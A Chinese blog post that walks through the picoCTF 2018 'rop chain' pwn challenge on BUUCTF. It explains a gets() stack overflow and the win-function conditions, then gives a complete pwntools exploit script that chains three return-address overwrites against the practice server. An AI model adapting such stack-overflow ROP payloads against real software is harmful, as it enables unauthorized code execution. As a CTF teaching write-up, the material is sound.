buuctf -picoctf_2018_rop chain

已于 2023-11-22 20:30:47 修改
阅读量139 收藏
点赞数
分类专栏: pwn 文章标签: linux
于 2023-09-16 21:32:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fuiifiuiii/article/details/132925301
版权

只开启了nx保护,用栈溢出做题,主打一个轻松愉快 -a-

一个gets栈溢出

看flag函数的逻辑顺序

很明显,已经将flag打开并输入到了s里,而想要输出就需要让win1==1、win2==1,以及a1=0xdeadbaad。显然a1是可以由我们自行传入的参数(即a1可控)

简单明了,win1=1

win2这里也有一些要求,即要求win1==1、a1=0xbaaaaaad,这样可以使得win2置1.

如此来看,逻辑就很清晰了,从vuln栈溢出跳转到win1,返回到vuln,跳转到win2并携带参数a1,返回到vuln,跳转到flag函数并携带参数a1(这个与上一个不同)

exp如下:

from pwn import*
context(log_level='debug',arch='i386',os='linux')
#p=process('./rop_chain')
p=remote('node4.buuoj.cn',25235)
sl = lambda s :p.sendline(s)
sd = lambda s :p.send(s)
rc = lambda s :p.recv(s)
ru = lambda s :p.recvuntil(s)
rl = lambda   :p.recvline()
​
vuln_addr = 0x8048714
flag_addr = 0x804862B
win1_addr = 0x80485CB 
win2_addr = 0x80485D8
​
payload = b'A'*(0x18+4)+p32(win1_addr)+p32(vuln_addr)
sl(payload)
​
payload = b'A'*(0x18+4)+p32(win2_addr)+p32(vuln_addr)+p32(0xbaaaaaad)
sl(payload)
​
payload = b'A'*(0x18+4)+p32(flag_addr)+p32(vuln_addr)+p32(0xdeadbaad)
sl(payload)
​
​
p.interactive()
~                                                                                                
XYYR-c
关注
专栏目录
BUUCTFpicoctf_2018_rop chain(write up)
qq_44768749的博客
08-26 1309
BUUCTFpicoctf_2018_rop chain0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp关键代码说明 0x01 文件分析 32位程序,开启了栈不可执行、部分RELRO保护 0x02 运行 输入一串字符串,根据题名也知道需要构造ROP 0x03 IDA 主函数 vuln函数 漏洞点:没有限制输入字符串长度 flag函数 win_function1函数 win_function2函数 0x04 思路 flag函数为后门函数
CTF-PWN-buuctf-not_the_same_3dsctf_2016-ROP函数返回到指定位置和ROP-chain的典型使用
serfend's blog
04-20 1517
CTF-PWN 来源:https://buuoj.cn/challenges 内容: 附件:链接:https://pan.baidu.com/s/1Wll80yDkRvz5XMW_xIZRNQ?pwd=uye9 提取码:uye9 答案:flag{c264d02e-6de6-4164-82a6-bdcb6c8ba64f} 总体思路 发现题目存在溢出点,并且给了flag相关的函数 但是此题是静态编译的,有很多其他不必要的函数,可以尝试直接使用ROP-chain方法get-shell 详细步骤 查看文件信
buuctf PicoCTF_2018_rop_chain
FUCKING12的博客
02-22 3316
PicoCTF_2018_rop_chain 没什么好说的就是一个rop链构造 上代码 from pwn import * #node4.buuoj.cn:25469 #io=remote("node4.buuoj.cn",25469) io=process("./PicoCTF_2018_rop_chain") elf=ELF('./PicoCTF_2018_rop_chain') context.log_level='debug' #io.recvline("Enter your input>
[BUUCTF]PWN——picoctf_2018_rop chain
mcmuyanga的博客
11-04 1042
picoctf_2018_rop chain 附件 步骤: 例行检查,32位,开启了NX保护 试运行一下程序,看到输入太长数据会崩溃 32位ida载入,习惯性的检索程序里的字符串,看见了flag.txt,双击跟进 看到程序将flag读入到了参数s里面,满足条件win1&&win2 &&a1==-59039827的条件,就能读出flag 从main函数开始看程序 vuln()函数 gets函数输入,没有限制读入长度,存在溢出漏洞,覆盖ret为flag函数地址,之后想
BUUCTF pwn——picoctf_2018_rop chain
CNS-Enterprise BCC-1701-J
04-26 595
BUUCTF 做题练习
BUUCTFPWN】picoctf_2018_rop chain
m0_55368674的博客
01-19 206
ret2text
picoctf_2018_rop chain
03-16
picoctf_2018_rop chain是一道CTF比赛中的题目,需要使用ROP(Return Oriented Programming)技术来解决。ROP是一种利用程序中已有的代码段(称为gadget)来构造攻击代码的技术,通过将多个gadget串联起来,可以实现...
CTF-PWN-buuctf-others_shellcode-系统int80调用的使用方法
serfend's blog
04-24 1640
CTF-PWN 来源:https://buuoj.cn/challenges 内容: 附件:https://pan.baidu.com/s/1twNiCnqBL17_WuQr1NdGBQ?pwd=g9by 提取码:g9by 答案:flag{d07d7b41-1672-4338-a72c-43e12c26c587} 总体思路 这题是一道32位系统调用的教学题 [CTF pwn]傻傻分不清的execve、int80、syscall、system及shellcode 详细步骤 查看文件信息 in
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 1011
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
Buuctf(pwn) picoctf_2018_rop chain 栈溢出
半岛铁盒的博客
08-19 308
32位,开启了NX保护 利用思路 首先溢出后覆盖ret为function1函数地址,将win1赋值为1,之后跳转到function2的地址,a1是传入的参数,将a1传入即可满足条件去设置win2的值为1,之后去执行flag函数,if要满足的条件之前都设置好了,可以直接读出flag from pwn import * r = remote("node3.buuoj.cn", 26602) win_function1 = 0x080485CB win_function2 = 0x080485D8 fla.
[BUUCTF-pwn]——picoctf_2018_rop chain
Y_peak的博客
02-23 208
[BUUCTF-pwn]——picoctf_2018_rop chain 题目地址: https://buuoj.cn/challenges#picoctf_2018_rop%20chain checksec看看,开启了NX,但是没有canary IDA中查看一下 发现gets函数,可以栈溢出 发现flag,不过需要满足条件,才可以获得 接着找可能用到的函数 接着找到对应函数的地址 思路 利用栈溢出,构造rop链,首先将win1 = 1, 然后 win2 = 1,最后获得flag explo
Linux介绍及常用命令
小旺的博客
10-16 643
1969 年,AT&T 公司的⻉尔实验室P MIT 合作开发的 Unix,í在于创建⼀个⽤于⼤型、并⾏、多⽤户的操作系统Unix 的推⼴:从学校⾛进企业Unix 的版本要两个:AT&T System V ——就是俗称的 系统 5linux是一种操作系统1991 年,芬兰赫尔⾟基⼤学的学⽣ Linus Torvals 为了能在家⾥的 PC 机上使⽤与学校⼀的操作系统,开始编写了类 UNIX.
Linux从小白到高手》综合应用篇:详解Linux系统调优之内存优化
qq_45732829的博客
10-11 945
内存是影响Linux性能的主要因素之一,内存资源的充足与否直接影响应用系统的使用性能。内存调优的主要目标是合理分配和利用内存资源,减少内存浪费,提高内存利用率,从而提升系统整体性能。
Linux--firewalld服务
Menimeky的专栏
10-16 691
firewalld是CentOS 7.0新推出的管理netfilter的用户空间软件工具firewalld是配置和监控防火墙规则的系统守护进程。可以实iptables,ip6tables,ebtables的功能firewalld服务由firewalld包提供firewalld支持划分区域zone,每个zone可以设置独立的防火墙规则先根据数据包中源地址,将其纳为某个zone纳为网络接口所属zone纳入默认zone,默认为public zone,管理员可以改为其它zone。
Linux 内核清理缓存命令
luoye_369的博客
10-11 295
一、问题描述log:
LeetCode题练习与总结:二叉树的序列化与反序列化--297
一直学习永不止步
10-11 1109
本文详细介绍了二叉树序列化与反序列化的实现方法,包括前序遍历序列化、队列辅助反序列化等,分析了时间复杂度和空间复杂度,并总结了涉及的重要知识点,为二叉树处理提供了实用的解决方案。
Linux:进程状态
最新发布
2301_79171011的博客
10-16 732
相对应地,在Windows操作系统中,当用户将一个耗时的任务,如下载大文件,最小化其窗口后,该任务便在后台运行。当CPU要调度pid为1的进程时,我们假设使用最简单的FIFO(先进先出)调度算法,那么CPU会到runqueue队列中找到第一个task_struct对象,获取该进程main函数地址和数据,放到CPU的寄存器中,并执行该进程。但是由于处于运行状态的进程太多而导致内存资源不足,而运行队列尾部的进程一段时间都不会被调度,操作系统就会将这些进程放到磁盘中的swap分区,此时进程状态叫做运行挂起状态。
《鸟哥的Linux私房菜基础篇》---1 Linux的介绍与如何开启Linux之路
bigger_belief的博客
10-12 766
主要讲解Linux基本属性和如何开启Linux之路
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值